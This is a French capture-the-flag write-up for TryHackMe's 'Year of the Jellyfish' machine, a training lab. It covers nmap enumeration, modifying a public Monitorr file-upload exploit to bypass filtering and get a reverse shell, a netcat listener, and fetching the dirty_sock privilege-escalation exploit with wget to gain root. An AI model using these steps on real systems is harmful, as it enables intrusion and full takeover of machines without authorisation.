Year of the Jellyfish – Write Up – TryHackMe – OSCP Like

Year of the Jellyfish de tryhackme est une box de type « OSCP like » dans laquelle, on verra comment exploiter un service vulnérable qui permettra d’obtenir un Remote Code Execution (rce)

Enumération

Tout d’abord, il faut énumérer la machine avec nmap 

nmap -A -p- ipaddress

Il y a beaucoup de port ouvert, qui tous des rabbits holes ( comme il arrive parfois sur les machines d’Offensive Security… )

Il faut surtout s’intéresser au port 443.

Comme on peut le voir sur la capture, il y a plusieurs sous domaine dont celui  monitorr.robyns-petshop.thm. En effectuant une recherche dans Google, on tombe facilement sur le site exploit-db qui propose deux exploits.

  • Monitorr 1.7.6m – Authorization Bypass

https://www.exploit-db.com/exploits/48980

  • Monitorr 1.7.6m – Authorization Bypass

https://www.exploit-db.com/exploits/48981

Pour la raison évoquer plus haut, nous allons utiliser le 2ᵉ exploit qui permet d’obtenir un RCE.

Voici les modifications (en rouge) à apporter au script afin de le rendre fonctionnel. 

requests.post(url, headers=headers, data=data, cookies={‘isHuman’:’1′} , verify=False)

requests.get(url, headers=headers, cookies={‘isHuman’:’1′}  , verify=False)

Sur les lignes 22 et 27 il faut modifier le nom du reverse shell afin de bypasser le filtrage par extentions et par type.

Le cookie isHuman s’obtient en allant sur le site monitorr et en faisant f12 sur Firefox.

FootHold

Maintenant que le script est configuré, il faut mettre en place un écouteur nc avec cette commande nc -nlvp 443 puis il faut exécuter le script. 

python3.9 48980_2.py https://monitorr.robyns-petshop.thm/ 10.8.76.250 443

Normalement, un reverse shell devrait arriver sur nc

S’il reverse shell n’arrive pas sur nc, il faut se rendre dans le répertoire d’upload à savoir : https://monitorr.robyns-petshop.thm/assets/data/usrimg/ . En cliquant sur le nom du shell, il s’exécutera. 

Local enumération

Le 1ier flag se trouve dans le répertoire /var/www

Linpeas ne trouve pas d’élément probant. En revanchant en utilisant Linux Exploit Suggester, on peut voir que plusieurs exploits sont  possible dont notamment [CVE-2019-7304] dirty_sock.

Pour télécharger LES directement sur la machine cible : 

git clone https://github.com/mzet-/linux-exploit-suggester.git

Puis faire cd /linux_exploit_suggester 

puis bash les.sh

Escalade de privilège

  • Téléchargement de l’exploit sur la machine victime.

wget https://raw.githubusercontent.com/initstring/dirty_sock/master/dirty_sockv2.py

  • Exécution du script :

python3 dirty_sockv2.py

Attention, vous aurez peut-être une erreur lors de l’exécution, sans pour autant signifier que l’exploit n’ai pas fonctionné.

De toute manière, il faut lire chaque script provenant d’internet avant de les utiliser. On peut donc voir, que dans le contenu de l’exploit, se trouve les identifiants à utiliser. Dotant plus que l’erreur n’est que problème de connexion et non d’exécution de l’exploit en lui-même .

Changement d’utilisateur :

su dirty_sock

password : dirty_sock

sudo cat /root/root.txt

 
0 0 votes
Évaluation de l'article
S’abonner
Notifier de
0 Commentaires
le plus ancien
le plus récent le plus populaire
Inline Feedbacks
View all comments